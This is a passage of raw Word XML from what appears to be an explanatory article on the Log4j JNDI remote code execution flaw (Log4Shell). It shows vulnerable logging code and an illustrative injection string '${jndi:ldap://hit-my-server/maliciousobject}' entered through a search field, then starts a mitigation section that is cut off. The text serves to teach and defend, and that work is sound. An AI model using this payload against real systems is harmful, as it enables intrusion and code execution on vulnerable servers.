      <w:r w:rsidR="00FB337C" w:rsidRPr="00316669">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382516C9" w14:textId="05556AF0" w:rsidR="00E0624E" w:rsidRDefault="00E0624E" w:rsidP="005E0942">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">JNDI is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Java Naming and Directory Interface</w:t>
      </w:r>
      <w:r w:rsidR="00C65F31">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows to store java objects </w:t>
      </w:r>
      <w:r w:rsidR="00D76707">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>in a remote location and serialise them</w:t>
      </w:r>
      <w:r w:rsidR="00FB337C">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> and JNDI lookups in log4J allow </w:t>
      </w:r>
      <w:r w:rsidR="00727ADF">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">to lookups from the logging </w:t>
      </w:r>
      <w:r w:rsidR="009F16F0">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDAAAFB" w14:textId="77777777" w:rsidR="009F16F0" w:rsidRPr="005C09CA" w:rsidRDefault="009F16F0" w:rsidP="005C09CA">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">final Logger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>LogManager.getLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>HelloWorld.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3BDE204C" w14:textId="1BCB4F07" w:rsidR="009F16F0" w:rsidRPr="005C09CA" w:rsidRDefault="009F16F0" w:rsidP="005C09CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidR="00A317F3" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A317F3" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Error Message is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>{}”,</w:t>
      </w:r>
      <w:r w:rsidR="00A317F3" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00135E14" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>“${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00367045" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00367045" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00367045" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00367045" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>/prefix</w:t>
      </w:r>
      <w:r w:rsidR="00135E14" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>}”</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A317F3" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>error.getMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A382C0" w14:textId="353249E8" w:rsidR="00692E01" w:rsidRDefault="00692E01" w:rsidP="005C09CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidR="00322E88" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Looks up value and inserts: {}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>”,”</w:t>
      </w:r>
      <w:r w:rsidR="00322E88" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CE7C0B" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE7C0B" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>://…</w:t>
      </w:r>
      <w:r w:rsidR="00322E88" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F43D26" w14:textId="5695E3D0" w:rsidR="009F16F0" w:rsidRDefault="00924602" w:rsidP="005E0942">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, </w:t>
      </w:r>
      <w:r w:rsidR="00311881">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>the JNDI URL is passed as an argument to print the prefix in the logging message</w:t>
      </w:r>
      <w:r w:rsidR="002A6453">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of just passing the value. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D333A" w14:textId="6466B3C0" w:rsidR="00EF55CA" w:rsidRPr="003A290F" w:rsidRDefault="00EF55CA" w:rsidP="00EF55CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc126223999"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>RCE in Log4j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA3827F" w14:textId="4DFC62A6" w:rsidR="004E225D" w:rsidRDefault="004E225D" w:rsidP="004E225D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E225D">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Consider the following scenario: there is a search feature in the web application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> and t</w:t>
      </w:r>
      <w:r w:rsidRPr="004E225D">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">he developer wishes to print the search text in the log while the user is searching. </w:t>
      </w:r>
      <w:r w:rsidRPr="004E225D">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidRPr="004E225D">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> the code looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E91455" w14:textId="32734825" w:rsidR="00C26F28" w:rsidRPr="005C09CA" w:rsidRDefault="00C26F28" w:rsidP="00C26F28">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">final Logger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>LogManager.getLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>HelloWorld.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="63BDBE8B" w14:textId="0DCA46A0" w:rsidR="00C26F28" w:rsidRDefault="00C26F28" w:rsidP="005C09CA">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Search page: Search results issued for the text -</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> {}”,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00651AAC" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>searchTextInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0655E7" w14:textId="3BB7F23F" w:rsidR="00C26F28" w:rsidRDefault="006F0FD5" w:rsidP="00EF55CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0FD5">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">But let's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F0FD5">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F0FD5">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> at how an end user or hacker might search using the below text instead of plain text.</w:t>
      </w:r>
      <w:r w:rsidR="00ED61E6">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD2B48" w14:textId="07714E8E" w:rsidR="00947E57" w:rsidRDefault="00947E57" w:rsidP="006A1185">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>://hit</w:t>
      </w:r>
      <w:r w:rsidR="00756571" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-my-server/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00756571" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>maliciousobject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF54CF" w14:textId="464DE49F" w:rsidR="00ED61E6" w:rsidRDefault="00ED61E6" w:rsidP="00EF55CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Now replace the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidR="00837650">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>TextInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00837650">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A197D30" w14:textId="5E43149C" w:rsidR="00837650" w:rsidRDefault="00837650" w:rsidP="006A1185">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(“Search page: Search results issued for the text - {}”,${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>://hit-my-server/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>maliciousobject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354884C0" w14:textId="235F7AA4" w:rsidR="00837650" w:rsidRPr="006B4CD3" w:rsidRDefault="004B1010" w:rsidP="00EF55CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1010">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>This is nothing more than a JNDI lookup, not just a simple hacker search. As a result, in this scenario, the web application will do a JNDI lookup to the hacker's JNDI server while executing malicious code, and then return with the serialised malicious object. As a result, anyone can insert code or objects into the web app JVM that weren't meant to be there. This is referred to as remote code execution, and it is classified as CVSS-10</w:t>
      </w:r>
      <w:r w:rsidR="006A1185">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C1B38D" w14:textId="1560A88E" w:rsidR="005E0942" w:rsidRPr="003A290F" w:rsidRDefault="004E3851" w:rsidP="005E0942">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc126224000"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>How to Mitigate</w:t>
      </w:r>
      <w:r w:rsidR="005E0942">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="005E0942" w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734F30B5" w14:textId="351B764F" w:rsidR="00581C2D" w:rsidRDefault="00BE7177" w:rsidP="005E0942">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7177">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's start by addressing RCE since it is the worst thing that </w:t>
      </w:r>
      <w:r w:rsidR="00F508D9">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ever</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7177">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> happen to a system. The two </w:t>
      </w:r>
      <w:r w:rsidR="00F508D9">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7177">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> listed below should be set to false for this. This is for JNDI and RMI, and the property ends with the trusted URL; this instructs the JVM not to trust any remote URLs. JVM flagged this as an external URL when attempting to resolve the remote URL and block</w:t>
      </w:r>
      <w:r w:rsidR="00F508D9">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7177">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r w:rsidR="000E4889">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB4950">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11F6F9" w14:textId="41E4CC23" w:rsidR="005E0942" w:rsidRDefault="00611968" w:rsidP="005E0942">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00611968">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">However, there is still a vulnerability, and this one relates to the environmental variables. To illustrate, </w:t>
      </w:r>
      <w:r w:rsidRPr="00611968">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>look</w:t>
      </w:r>
      <w:r w:rsidRPr="00611968">
        <w:rPr>
